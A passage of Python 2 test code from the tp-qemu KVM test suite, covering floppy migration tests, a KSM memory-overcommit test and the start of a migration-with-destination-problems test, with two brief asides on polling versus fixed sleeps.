                                timeout=30)

                error.context("File copying test.", logging.info)

                pid = lazy_copy(vm, src_file, check_copy_path, copy_timeout)

            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

            pid = sync.sync(pid, timeout=floppy_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in destination
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                error.context("Wait for copy finishing.", logging.info)
                status = session.cmd_status("kill %s" % pid,
                                            timeout=copy_timeout)
                if status != 0:
                    raise error.TestFail("Copy process was terminated with"
                                         " error code %s" % (status))

                session.cmd_status("kill -s SIGINT %s" % (pid),
                                   timeout=copy_timeout)

                error.context("Check floppy file checksum.", logging.info)
                md5_cmd = params.get("md5_cmd", "md5sum")
                if md5_cmd:
                    md5_floppy = session.cmd("%s %s" % (md5_cmd, src_file))
                    try:
                        md5_floppy = md5_floppy.split(" ")[0]
                    except IndexError:
                        raise error.TestError("Failed to get md5 from source file,"
                                              " output: '%s'" % md5_floppy)
                    md5_check = session.cmd("%s %s" % (md5_cmd, check_copy_path))
                    try:
                        md5_check = md5_check.split(" ")[0]
                    except IndexError:
                        raise error.TestError("Failed to get md5 from dst file,"
                                              " output: '%s'" % md5_check)
                    if md5_check != md5_floppy:
                        raise error.TestFail("Copied data does not match the"
                                             " source; check the file on the vm.")

                session.cmd("rm -f %s" % (src_file))
                session.cmd("rm -f %s" % (check_copy_path))

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'finish_floppy_test', login_timeout)

        def clean(self):
            super(test_multihost_write, self).clean()

    class test_multihost_eject(Multihost):

        def test(self):
            super(test_multihost_eject, self).test()

            self.mount_dir = params.get("mount_dir", None)
            format_floppy_cmd = params["format_floppy_cmd"]
            floppy = params["floppy_name"]
            second_floppy = params["second_floppy_name"]
            if not os.path.isabs(floppy):
                floppy = os.path.join(data_dir.get_data_dir(), floppy)
            if not os.path.isabs(second_floppy):
                second_floppy = os.path.join(data_dir.get_data_dir(),
                                             second_floppy)
            if not self.is_src:
                self.floppy = create_floppy(params)

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_transfer"}
            filename = "orig"
            src_file = os.path.join(self.mount_dir, filename)

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)

                if self.mount_dir:   # If linux
                    session.cmd("rm -f %s" % (src_file))
                # If mount_dir is specified, treat the guest as a Linux OS.
                # Some Linux distributions do not load the floppy module at
                # boot, and Windows needs time to load and init the floppy
                # driver.
                error.context("Prepare floppy for writing.", logging.info)
                if self.mount_dir:   # If linux
                    lsmod = session.cmd("lsmod")
                    if 'floppy' not in lsmod:
                        session.cmd("modprobe floppy")
                else:
                    time.sleep(20)

                if floppy not in vm.monitor.info("block"):
                    raise error.TestFail("Wrong floppy image is placed in vm.")

                try:
                    session.cmd(format_floppy_cmd)
                except aexpect.ShellCmdError, e:
                    if e.status == 1:
                        logging.error("First access to floppy failed, "
                                      "trying a second time as a workaround")
                        session.cmd(format_floppy_cmd)

                error.context("Check floppy")
                if self.mount_dir:   # If linux
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir), timeout=30)
                    session.cmd("umount %s" % (self.mount_dir), timeout=30)

                written = None
                if self.mount_dir:
                    filepath = os.path.join(self.mount_dir, "test.txt")
                    session.cmd("echo 'test' > %s" % (filepath))
                    output = session.cmd("cat %s" % (filepath))
                    written = "test\n"
                else:   # Windows version.
                    filepath = "A:\\test.txt"
                    session.cmd("echo test > %s" % (filepath))
                    output = session.cmd("type %s" % (filepath))
                    written = "test \n\n"
                if output != written:
                    raise error.TestFail("Data read from the floppy differs"
                                         " from the data written to it."
                                         " EXPECTED: %s GOT: %s" %
                                         (repr(written), repr(output)))

                error.context("Change floppy.")
                vm.monitor.cmd("eject floppy0")
                vm.monitor.cmd("change floppy %s" % (second_floppy))
                session.cmd(format_floppy_cmd)

                error.context("Mount and copy data")
                if self.mount_dir:   # If linux
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir), timeout=30)

                if second_floppy not in vm.monitor.info("block"):
                    raise error.TestFail("Wrong floppy image is placed in vm.")

            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

            pid = sync.sync(pid, timeout=floppy_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in destination
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                written = None
                if self.mount_dir:
                    filepath = os.path.join(self.mount_dir, "test.txt")
                    session.cmd("echo 'test' > %s" % (filepath))
                    output = session.cmd("cat %s" % (filepath))
                    written = "test\n"
                else:   # Windows version.
                    filepath = "A:\\test.txt"
                    session.cmd("echo test > %s" % (filepath))
                    output = session.cmd("type %s" % (filepath))
                    written = "test \n\n"
                if output != written:
                    raise error.TestFail("Data read from the floppy differs"
                                         " from the data written to it."
                                         " EXPECTED: %s GOT: %s" %
                                         (repr(written), repr(output)))

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'finish_floppy_test', login_timeout)

        def clean(self):
            super(test_multihost_eject, self).clean()

    test_type = params.get("test_type", "test_singlehost")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " migration_with_dst_problem test" % test_type)

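A side note on the bare time.sleep(20) in the two tests above: when mount_dir is not set the test treats the guest as Windows, and since there is no cheap condition to poll for "floppy driver ready", it falls back to a fixed delay. The sketch below is not part of the original test; the helper name wait_for_floppy and its arguments are invented here purely to illustrate the poll-if-you-can, sleep-if-you-must choice:

import time

def wait_for_floppy(session, mount_dir, fixed_delay=20):
    # Linux guests (mount_dir set) expose a condition we can poll cheaply:
    # is the floppy module loaded? If not, load it and return immediately.
    if mount_dir:
        if 'floppy' not in session.cmd("lsmod"):
            session.cmd("modprobe floppy")
        return
    # Windows guests offer no such probe here, so accept a fixed delay,
    # wasting time on fast systems and hoping it is enough on slow ones.
    time.sleep(fixed_delay)
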
Example 9

Project: tp-qemu
Source File: ksm_overcommit.py
View license
def run(test, params, env):
    """
    Tests the KSM (Kernel Shared Memory) capability by allocating and filling
    KVM guests' memory with various values. KVM marks the memory as
    MADV_MERGEABLE so all of a VM's memory can be merged. The workers in the
    guest write to a tmpfs filesystem, so allocations are not limited by the
    process's max memory, only by the VM's memory. Two test modes are
    supported - serial and parallel.

    Serial mode - uses multiple VMs, allocates memory per guest and always
                  verifies the correct amount of shared memory.
                  0) Prints out the setup and initializes guest(s)
                  1) Fills each guest with the same value (S1)
                  2) Random fill on the first guest
                  3) Random fill of the remaining VMs one by one until the
                     memory is completely filled (KVM stops machines which
                     ask for additional memory until memory becomes
                     available) (S2, shouldn't finish)
                  4) Destroys all VMs but the last one
                  5) Checks the last VM's memory for corruption
    Parallel mode - uses one VM with multiple allocator workers. Executes
                   scenarios in parallel to put more stress on KVM.
                   0) Prints out the setup and initializes the guest
                   1) Fills memory with the same value (S1)
                   2) Fills memory with random values (S2)
                   3) Verifies all pages
                   4) Fills memory with the same value again (S1)
                   5) Changes the last 96B of each page (S3)

    Scenarios:
    S1) Fill all VMs with the same value (all pages should be merged into 1)
    S2) Random fill (all pages should be split)
    S3) Fill the last 96B (change only the last 96B of each page; some pages
                      will be merged; there was a bug with data corruption)
    Every worker has a unique random key so we are able to verify the filled
    values.

    :param test: kvm test object.
    :param params: Dictionary with test parameters.
    :param env: Dictionary with the test environment.

    :param cfg: ksm_swap - use swap?
    :param cfg: ksm_overcommit_ratio - memory overcommit (serial mode only)
    :param cfg: ksm_parallel_ratio - number of workers (parallel mode only)
    :param cfg: ksm_host_reserve - override memory reserve on host in MB
    :param cfg: ksm_guest_reserve - override memory reserve on guests in MB
    :param cfg: ksm_mode - test mode {serial, parallel}
    :param cfg: ksm_perf_ratio - performance ratio, increase it when your
                                 machine is too slow
    """
    def _start_allocator(vm, session, timeout):
        """
        Execute ksm_overcommit_guest.py on guest, wait until it's initialized.

        :param vm: VM object.
        :param session: Remote session to a VM object.
        :param timeout: Timeout that will be used to verify if
                ksm_overcommit_guest.py started properly.
        """
        logging.debug("Starting ksm_overcommit_guest.py on guest %s", vm.name)
        session.sendline("python /tmp/ksm_overcommit_guest.py")
        try:
            session.read_until_last_line_matches(["PASS:", "FAIL:"], timeout)
        except aexpect.ExpectProcessTerminatedError, details:
            e_msg = ("Command ksm_overcommit_guest.py on vm '%s' failed: %s" %
                     (vm.name, str(details)))
            raise error.TestFail(e_msg)

    def _execute_allocator(command, vm, session, timeout):
        """
        Execute a given command on ksm_overcommit_guest.py main loop,
        indicating the vm the command was executed on.

        :param command: Command that will be executed.
        :param vm: VM object.
        :param session: Remote session to VM object.
        :param timeout: Timeout used to verify expected output.

        :return: Tuple (match index, data)
        """
        logging.debug("Executing '%s' on ksm_overcommit_guest.py loop, "
                      "vm: %s, timeout: %s", command, vm.name, timeout)
        session.sendline(command)
        try:
            (match, data) = session.read_until_last_line_matches(
                ["PASS:", "FAIL:"],
                timeout)
        except aexpect.ExpectProcessTerminatedError, details:
            e_msg = ("Failed to execute command '%s' on "
                     "ksm_overcommit_guest.py, vm '%s': %s" %
                     (command, vm.name, str(details)))
            raise error.TestFail(e_msg)
        return (match, data)

    def get_ksmstat():
        """
        Return the amount of memory currently shared by KSM, in MB.

        :return: shared memory in MB
        """
        fpages = open('/sys/kernel/mm/ksm/pages_sharing')
        ksm_pages = int(fpages.read())
        fpages.close()
        return ((ksm_pages * 4096) / 1e6)

    def initialize_guests():
        """
        Initialize guests (fill their memories with specified patterns).
        """
        logging.info("Phase 1: filling guest memory pages")
        for session in lsessions:
            vm = lvms[lsessions.index(session)]

            logging.debug("Turning off swap on vm %s", vm.name)
            session.cmd("swapoff -a", timeout=300)

            # Start the allocator
            _start_allocator(vm, session, 60 * perf_ratio)

        # Execute allocator on guests
        for i in range(0, vmsc):
            vm = lvms[i]

            cmd = "mem = MemFill(%d, %s, %s)" % (ksm_size, skeys[i], dkeys[i])
            _execute_allocator(cmd, vm, lsessions[i], 60 * perf_ratio)

            cmd = "mem.value_fill(%d)" % skeys[0]
            _execute_allocator(cmd, vm, lsessions[i],
                               fill_base_timeout * 2 * perf_ratio)

            # Let ksm_overcommit_guest.py do its job
            # (until shared mem reaches expected value)
            shm = 0
            j = 0
            logging.debug("Target shared meminfo for guest %s: %s", vm.name,
                          ksm_size)
            while ((new_ksm and (shm < (ksm_size * (i + 1)))) or
                    (not new_ksm and (shm < (ksm_size)))):
                if j > 64:
                    logging.debug(utils_test.get_memory_info(lvms))
                    raise error.TestError("KSM did not merge the memory "
                                          "before the deadline on guest: %s"
                                          % vm.name)
                pause = ksm_size / 200 * perf_ratio
                logging.debug("Waiting %ds before proceeding...", pause)
                time.sleep(pause)
                if (new_ksm):
                    shm = get_ksmstat()
                else:
                    shm = vm.get_shared_meminfo()
                logging.debug("Shared meminfo for guest %s after "
                              "iteration %s: %s", vm.name, j, shm)
                j += 1

        # Keep some reserve
        pause = ksm_size / 200 * perf_ratio
        logging.debug("Waiting %ds before proceeding...", pause)
        time.sleep(pause)

        logging.debug(utils_test.get_memory_info(lvms))
        logging.info("Phase 1: PASS")

    def separate_first_guest():
        """
        Separate memory of the first guest by generating special random series
        """
        logging.info("Phase 2: Split the pages on the first guest")

        cmd = "mem.static_random_fill()"
        data = _execute_allocator(cmd, lvms[0], lsessions[0],
                                  fill_base_timeout * 2 * perf_ratio)[1]

        r_msg = data.splitlines()[-1]
        logging.debug("Return message of static_random_fill: %s", r_msg)
        out = int(r_msg.split()[4])
        logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s", ksm_size,
                      out, (ksm_size * 1000 / out))
        logging.debug(utils_test.get_memory_info(lvms))
        logging.debug("Phase 2: PASS")

    def split_guest():
        """
        Sequential split of pages on guests up to memory limit
        """
        logging.info("Phase 3a: Sequential split of pages on guests up to "
                     "memory limit")
        last_vm = 0
        session = None
        vm = None
        for i in range(1, vmsc):
            # Check VMs
            for j in range(0, vmsc):
                if not lvms[j].is_alive:
                    e_msg = ("VM %d died while executing static_random_fill on"
                             " VM %d in allocator loop" % (j, i))
                    raise error.TestFail(e_msg)
            vm = lvms[i]
            session = lsessions[i]
            cmd = "mem.static_random_fill()"
            logging.debug("Executing %s on ksm_overcommit_guest.py loop, "
                          "vm: %s", cmd, vm.name)
            session.sendline(cmd)

            out = ""
            try:
                logging.debug("Watching host mem while filling vm %s memory",
                              vm.name)
                while (not out.startswith("PASS") and
                       not out.startswith("FAIL")):
                    if not vm.is_alive():
                        e_msg = ("VM %d died while executing "
                                 "static_random_fill on allocator loop" % i)
                        raise error.TestFail(e_msg)
                    free_mem = int(utils_memory.read_from_meminfo("MemFree"))
                    if (ksm_swap):
                        free_mem = (free_mem +
                                    int(utils_memory.read_from_meminfo("SwapFree")))
                    logging.debug("Free memory on host: %d", free_mem)

                    # We need to keep some memory for python to run.
                    if (free_mem < 64000) or (ksm_swap and
                                              free_mem < (450000 * perf_ratio)):
                        vm.pause()
                        for j in range(0, i):
                            lvms[j].destroy(gracefully=False)
                        time.sleep(20)
                        vm.resume()
                        logging.debug("Only %s free memory, killing %d guests",
                                      free_mem, (i - 1))
                        last_vm = i
                    out = session.read_nonblocking(0.1, 1)
                    time.sleep(2)
            except OSError:
                logging.debug("Only %s host free memory, killing %d guests",
                              free_mem, (i - 1))
                logging.debug("Stopping %s", vm.name)
                vm.pause()
                for j in range(0, i):
                    logging.debug("Destroying %s", lvms[j].name)
                    lvms[j].destroy(gracefully=False)
                time.sleep(20)
                vm.resume()
                last_vm = i

            if last_vm != 0:
                break
            logging.debug("Memory filled for guest %s", vm.name)

        logging.info("Phase 3a: PASS")

        logging.info("Phase 3b: Verify memory of the max stressed VM")
        for i in range(last_vm + 1, vmsc):
            lsessions[i].close()
            if i == (vmsc - 1):
                logging.debug(utils_test.get_memory_info([lvms[i]]))
            logging.debug("Destroying guest %s", lvms[i].name)
            lvms[i].destroy(gracefully=False)

        # Verify last machine with randomly generated memory
        cmd = "mem.static_random_verify()"
        _execute_allocator(cmd, lvms[last_vm], lsessions[last_vm],
                           (mem / 200 * 50 * perf_ratio))
        logging.debug(utils_test.get_memory_info([lvms[last_vm]]))

        lsessions[last_vm].cmd_output("die()", 20)
        lvms[last_vm].destroy(gracefully=False)
        logging.info("Phase 3b: PASS")

    def split_parallel():
        """
        Parallel page splitting
        """
        logging.info("Phase 1: parallel page splitting")
        # We have to wait until the allocator is finished (it waits 5 seconds
        # to clean up the socket).

        session = lsessions[0]
        vm = lvms[0]
        for i in range(1, max_alloc):
            lsessions.append(vm.wait_for_login(timeout=360))

        session.cmd("swapoff -a", timeout=300)

        for i in range(0, max_alloc):
            # Start the allocator
            _start_allocator(vm, lsessions[i], 60 * perf_ratio)

        logging.info("Phase 1: PASS")

        logging.info("Phase 2a: Simultaneous merging")
        logging.debug("Memory used by allocator on guests = %dMB",
                      (ksm_size / max_alloc))

        for i in range(0, max_alloc):
            cmd = "mem = MemFill(%d, %s, %s)" % ((ksm_size / max_alloc),
                                                 skeys[i], dkeys[i])
            _execute_allocator(cmd, vm, lsessions[i], 60 * perf_ratio)

            cmd = "mem.value_fill(%d)" % (skeys[0])
            _execute_allocator(cmd, vm, lsessions[i],
                               fill_base_timeout * perf_ratio)

        # Wait until ksm_overcommit_guest.py merges pages (3 * ksm_size / 3)
        shm = 0
        i = 0
        logging.debug("Target shared memory size: %s", ksm_size)
        while (shm < ksm_size):
            if i > 64:
                logging.debug(utils_test.get_memory_info(lvms))
                raise error.TestError("KSM did not merge the memory before"
                                      " the deadline")
            pause = ksm_size / 200 * perf_ratio
            logging.debug("Waiting %ds before proceeding...", pause)
            time.sleep(pause)
            if (new_ksm):
                shm = get_ksmstat()
            else:
                shm = vm.get_shared_meminfo()
            logging.debug("Shared meminfo after attempt %s: %s", i, shm)
            i += 1

        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2a: PASS")

        logging.info("Phase 2b: Simultaneous splitting")
        # Actual splitting
        for i in range(0, max_alloc):
            cmd = "mem.static_random_fill()"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * perf_ratio)[1]

            data = data.splitlines()[-1]
            logging.debug(data)
            out = int(data.split()[4])
            logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s",
                          (ksm_size / max_alloc), out,
                          (ksm_size * 1000 / out / max_alloc))
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2b: PASS")

        logging.info("Phase 2c: Simultaneous verification")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_verify()"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      (mem / 200 * 50 * perf_ratio))[1]
        logging.info("Phase 2c: PASS")

        logging.info("Phase 2d: Simultaneous merging")
        # Actual merging (refill with the same value)
        for i in range(0, max_alloc):
            cmd = "mem.value_fill(%d)" % skeys[0]
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * 2 * perf_ratio)[1]
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2d: PASS")

        logging.info("Phase 2e: Simultaneous verification")
        for i in range(0, max_alloc):
            cmd = "mem.value_check(%d)" % skeys[0]
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      (mem / 200 * 50 * perf_ratio))[1]
        logging.info("Phase 2e: PASS")

        logging.info("Phase 2f: Simultaneous splitting of last 96B")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_fill(96)"
            data = _execute_allocator(cmd, vm, lsessions[i],
                                      fill_base_timeout * perf_ratio)[1]

            data = data.splitlines()[-1]
            out = int(data.split()[4])
            logging.debug("Performance: %dMB * 1000 / %dms = %dMB/s",
                          ksm_size / max_alloc, out,
                          (ksm_size * 1000 / out / max_alloc))

        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2f: PASS")

        logging.info("Phase 2g: Simultaneous verification last 96B")
        for i in range(0, max_alloc):
            cmd = "mem.static_random_verify(96)"
            _, data = _execute_allocator(cmd, vm, lsessions[i],
                                         (mem / 200 * 50 * perf_ratio))
        logging.debug(utils_test.get_memory_info([vm]))
        logging.info("Phase 2g: PASS")

        logging.debug("Cleaning up...")
        for i in range(0, max_alloc):
            lsessions[i].cmd_output("die()", 20)
        session.close()
        vm.destroy(gracefully=False)

    # Main test code
    logging.info("Starting phase 0: Initialization")
    if utils.run("ps -C ksmtuned", ignore_status=True).exit_status == 0:
        logging.info("Killing ksmtuned...")
        utils.run("killall ksmtuned")
    new_ksm = False
    if (os.path.exists("/sys/kernel/mm/ksm/run")):
        utils.run("echo 50 > /sys/kernel/mm/ksm/sleep_millisecs")
        utils.run("echo 5000 > /sys/kernel/mm/ksm/pages_to_scan")
        utils.run("echo 1 > /sys/kernel/mm/ksm/run")

        e_up = "/sys/kernel/mm/transparent_hugepage/enabled"
        e_rh = "/sys/kernel/mm/redhat_transparent_hugepage/enabled"
        if os.path.exists(e_up):
            utils.run("echo 'never' > %s" % e_up)
        if os.path.exists(e_rh):
            utils.run("echo 'never' > %s" % e_rh)
        new_ksm = True
    else:
        try:
            utils.run("modprobe ksm")
            utils.run("ksmctl start 5000 100")
        except error.CmdError, details:
            raise error.TestFail("Failed to load KSM: %s" % details)

    # host_reserve: mem reserve kept for the host system to run
    host_reserve = int(params.get("ksm_host_reserve", -1))
    if (host_reserve == -1):
        # default host_reserve = currently used host memory + one minimal
        # guest (128MB)
        # later we add 64MB per additional guest
        host_reserve = ((utils_memory.memtotal() -
                         utils_memory.read_from_meminfo("MemFree")) /
                        1024 + 128)
        # using default reserve
        _host_reserve = True
    else:
        _host_reserve = False

    # guest_reserve: mem reserve kept to avoid guest OS to kill processes
    guest_reserve = int(params.get("ksm_guest_reserve", -1))
    if (guest_reserve == -1):
        # default guest_reserve = minimal_system_mem(256MB)
        # later we add tmpfs overhead
        guest_reserve = 256
        # using default reserve
        _guest_reserve = True
    else:
        _guest_reserve = False

    max_vms = int(params.get("max_vms", 2))
    overcommit = float(params.get("ksm_overcommit_ratio", 2.0))
    max_alloc = int(params.get("ksm_parallel_ratio", 1))

    # vmsc: count of all used VMs
    vmsc = int(overcommit) + 1
    vmsc = max(vmsc, max_vms)

    if (params['ksm_mode'] == "serial"):
        max_alloc = vmsc
        if _host_reserve:
            # First round of additional guest reserves
            host_reserve += vmsc * 64
            _host_reserve = vmsc

    host_mem = (int(utils_memory.memtotal()) / 1024 - host_reserve)

    ksm_swap = False
    if params.get("ksm_swap") == "yes":
        ksm_swap = True

    # Performance ratio
    perf_ratio = params.get("ksm_perf_ratio")
    if perf_ratio:
        perf_ratio = float(perf_ratio)
    else:
        perf_ratio = 1

    if (params['ksm_mode'] == "parallel"):
        vmsc = 1
        overcommit = 1
        mem = host_mem
        # 32bit system adjustment
        if "64" not in params.get("vm_arch_name"):
            logging.debug("Probably i386 guest architecture, "
                          "max allocator mem = 2G")
            # Guest can have more than 2G but
            # kvm mem + 1MB (allocator itself) can't
            if (host_mem > 3100):
                mem = 3100

        if os.popen("uname -i").readline().startswith("i386"):
            logging.debug("Host is i386 architecture, max guest mem is 2G")
            # Guest system with qemu overhead (64M) can't have more than 2G
            if mem > 3100 - 64:
                mem = 3100 - 64

    else:
        # mem: Memory of the guest systems. Maximum must be less than
        # host's physical ram
        mem = int(overcommit * host_mem / vmsc)

        # 32bit system adjustment
        if not params['image_name'].endswith("64"):
            logging.debug("Probably i386 guest architecture, "
                          "max allocator mem = 2G")
            # Guest can have more than 2G but
            # kvm mem + 1MB (allocator itself) can't
            if mem - guest_reserve - 1 > 3100:
                vmsc = int(math.ceil((host_mem * overcommit) /
                                     (3100 + guest_reserve)))
                if _host_reserve:
                    host_reserve += (vmsc - _host_reserve) * 64
                    host_mem -= (vmsc - _host_reserve) * 64
                    _host_reserve = vmsc
                mem = int(math.floor(host_mem * overcommit / vmsc))

        if os.popen("uname -i").readline().startswith("i386"):
            logging.debug("Host is i386 architecture, max guest mem is 2G")
            # Guest system with qemu overhead (64M) can't have more than 2G
            if mem > 3100 - 64:
                vmsc = int(math.ceil((host_mem * overcommit) /
                                     (3100 - 64.0)))
                if _host_reserve:
                    host_reserve += (vmsc - _host_reserve) * 64
                    host_mem -= (vmsc - _host_reserve) * 64
                    _host_reserve = vmsc
                mem = int(math.floor(host_mem * overcommit / vmsc))

    # 0.055 represents OS + TMPFS additional reserve per guest ram MB
    if _guest_reserve:
        guest_reserve += math.ceil(mem * 0.055)

    swap = int(utils_memory.read_from_meminfo("SwapTotal")) / 1024

    logging.debug("Overcommit = %f", overcommit)
    logging.debug("True overcommit = %f ", (float(vmsc * mem) /
                                            float(host_mem)))
    logging.debug("Host memory = %dM", host_mem)
    logging.debug("Guest memory = %dM", mem)
    logging.debug("Using swap = %s", ksm_swap)
    logging.debug("Swap = %dM", swap)
    logging.debug("max_vms = %d", max_vms)
    logging.debug("Count of all used VMs = %d", vmsc)
    logging.debug("Performance_ratio = %f", perf_ratio)

    # Generate unique keys for random series
    skeys = []
    dkeys = []
    for i in range(0, max(vmsc, max_alloc)):
        key = random.randrange(0, 255)
        while key in skeys:
            key = random.randrange(0, 255)
        skeys.append(key)

        key = random.randrange(0, 999)
        while key in dkeys:
            key = random.randrange(0, 999)
        dkeys.append(key)

    logging.debug("skeys: %s", skeys)
    logging.debug("dkeys: %s", dkeys)

    lvms = []
    lsessions = []

    # As we don't know the number and memory amount of VMs in advance,
    # we need to specify and create them here
    vm_name = params["main_vm"]
    params['mem'] = mem
    params['vms'] = vm_name
    # Associate pidfile name
    params['pid_' + vm_name] = utils_misc.generate_tmp_file_name(vm_name,
                                                                 'pid')
    if not params.get('extra_params'):
        params['extra_params'] = ' '
    params['extra_params_' + vm_name] = params.get('extra_params')
    params['extra_params_' + vm_name] += (" -pidfile %s" %
                                          (params.get('pid_' + vm_name)))
    params['extra_params'] = params.get('extra_params_' + vm_name)

    # ksm_size: amount of memory used by allocator
    ksm_size = mem - guest_reserve
    logging.debug("Memory used by allocator on guests = %dM", ksm_size)
    fill_base_timeout = ksm_size / 10

    # Creating the first guest
    env_process.preprocess_vm(test, params, env, vm_name)
    lvms.append(env.get_vm(vm_name))
    if not lvms[0]:
        raise error.TestError("VM object not found in environment")
    if not lvms[0].is_alive():
        raise error.TestError("VM seems to be dead; Test requires a living "
                              "VM")

    logging.debug("Booting first guest %s", lvms[0].name)

    lsessions.append(lvms[0].wait_for_login(timeout=360))
    # Associate vm PID
    try:
        tmp = open(params.get('pid_' + vm_name), 'r')
        params['pid_' + vm_name] = int(tmp.readline())
    except Exception:
        raise error.TestFail("Could not get PID of %s" % (vm_name))

    # Creating other guest systems
    for i in range(1, vmsc):
        vm_name = "vm" + str(i + 1)
        params['pid_' + vm_name] = utils_misc.generate_tmp_file_name(vm_name,
                                                                     'pid')
        params['extra_params_' + vm_name] = params.get('extra_params')
        params['extra_params_' + vm_name] += (" -pidfile %s" %
                                              (params.get('pid_' + vm_name)))
        params['extra_params'] = params.get('extra_params_' + vm_name)

        # Last VM is later used to run more allocators simultaneously
        lvms.append(lvms[0].clone(vm_name, params))
        env.register_vm(vm_name, lvms[i])
        params['vms'] += " " + vm_name

        logging.debug("Booting guest %s", lvms[i].name)
        lvms[i].create()
        if not lvms[i].is_alive():
            raise error.TestError("VM %s seems to be dead; Test requires a"
                                  " living VM" % lvms[i].name)

        lsessions.append(lvms[i].wait_for_login(timeout=360))
        try:
            tmp = open(params.get('pid_' + vm_name), 'r')
            params['pid_' + vm_name] = int(tmp.readline())
        except Exception:
            raise error.TestFail("Could not get PID of %s" % (vm_name))

    # Let guests rest a little bit :-)
    pause = vmsc * 2 * perf_ratio
    logging.debug("Waiting %ds before proceeding", pause)
    time.sleep(pause)
    logging.debug(utils_test.get_memory_info(lvms))

    # Copy ksm_overcommit_guest.py into guests
    shared_dir = os.path.dirname(data_dir.get_data_dir())
    vksmd_src = os.path.join(shared_dir, "scripts", "ksm_overcommit_guest.py")
    dst_dir = "/tmp"
    for vm in lvms:
        vm.copy_files_to(vksmd_src, dst_dir)
    logging.info("Phase 0: PASS")

    if params['ksm_mode'] == "parallel":
        logging.info("Starting KSM test parallel mode")
        split_parallel()
        logging.info("KSM test parallel mode: PASS")
    elif params['ksm_mode'] == "serial":
        logging.info("Starting KSM test serial mode")
        initialize_guests()
        separate_first_guest()
        split_guest()
        logging.info("KSM test serial mode: PASS")

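The waiting loops in initialize_guests() and split_parallel() above share a pattern that recurs with time.sleep: sleep for a pause scaled to the amount of work, re-read a counter, and give up after a bounded number of iterations rather than spinning forever. The snippet below is only a stand-alone sketch of that pattern, not code from the project; read_counter and target are hypothetical stand-ins for get_ksmstat() and ksm_size:

import time

def wait_until(read_counter, target, pause, max_iterations=64):
    # Poll read_counter() until it reaches target, sleeping `pause` seconds
    # between attempts, and fail loudly after max_iterations tries.
    for _ in range(max_iterations):
        value = read_counter()
        if value >= target:
            return value
        time.sleep(pause)
    raise RuntimeError("value %s never reached target %s" % (value, target))

In the example above the equivalent call would be roughly wait_until(get_ksmstat, ksm_size, ksm_size / 200 * perf_ratio); the pause is scaled by perf_ratio so a slow machine simply waits longer per attempt instead of hitting the iteration cap sooner.
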
Example 10

View license
@error.context_aware
def run(test, params, env):
    """
    KVM migration with destination problems.
    Contains a group of tests for checking qemu behavior when problems
    happen on the destination side.

    The tests are described in the comments of the test classes below.

    The test needs params: nettype = bridge.

    :param test: kvm test object.
    :param params: Dictionary with test parameters.
    :param env: Dictionary with the test environment.
    """
    login_timeout = int(params.get("login_timeout", 360))
    mig_timeout = float(params.get("mig_timeout", "3600"))
    mig_protocol = params.get("migration_protocol", "tcp")

    test_rand = None
    mount_path = None
    while mount_path is None or os.path.exists(mount_path):
        test_rand = utils.generate_random_string(3)
        mount_path = ("%s/ni_mount_%s" %
                      (data_dir.get_data_dir(), test_rand))

    mig_dst = os.path.join(mount_path, "mig_dst")

    migration_exec_cmd_src = params.get("migration_exec_cmd_src",
                                        "gzip -c > %s")
    migration_exec_cmd_src = (migration_exec_cmd_src % (mig_dst))

    class MiniSubtest(object):

        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    def control_service(session, service, init_service, action, timeout=60):
        """
        Control a service on the guest.

        :param session: Remote session to the guest.
        :param service: Service to control.
        :param init_service: Name of the service for the old (SysV) service
                             control.
        :param action: Action to perform (start|stop|restart).
        :param timeout: Timeout for the service commands.
        """
        status = utils_misc.get_guest_service_status(session, service,
                                                     service_former=init_service)
        if action == "start" and status == "active":
            logging.debug("%s already started, no need start it again.",
                          service)
            return
        if action == "stop" and status == "inactive":
            logging.debug("%s already stopped, no need stop it again.",
                          service)
            return
        try:
            session.cmd("systemctl --version", timeout=timeout)
            session.cmd("systemctl %s %s.service" % (action, service),
                        timeout=timeout)
        except:
            session.cmd("service %s %s" % (init_service, action),
                        timeout=timeout)

    def set_nfs_server(vm, share_cfg):
        """
        Start an NFS server on the guest.

        :param vm: Virtual machine on which the NFS server is started.
        :param share_cfg: Export line written to /etc/exports on the guest.
        """
        session = vm.wait_for_login(timeout=login_timeout)
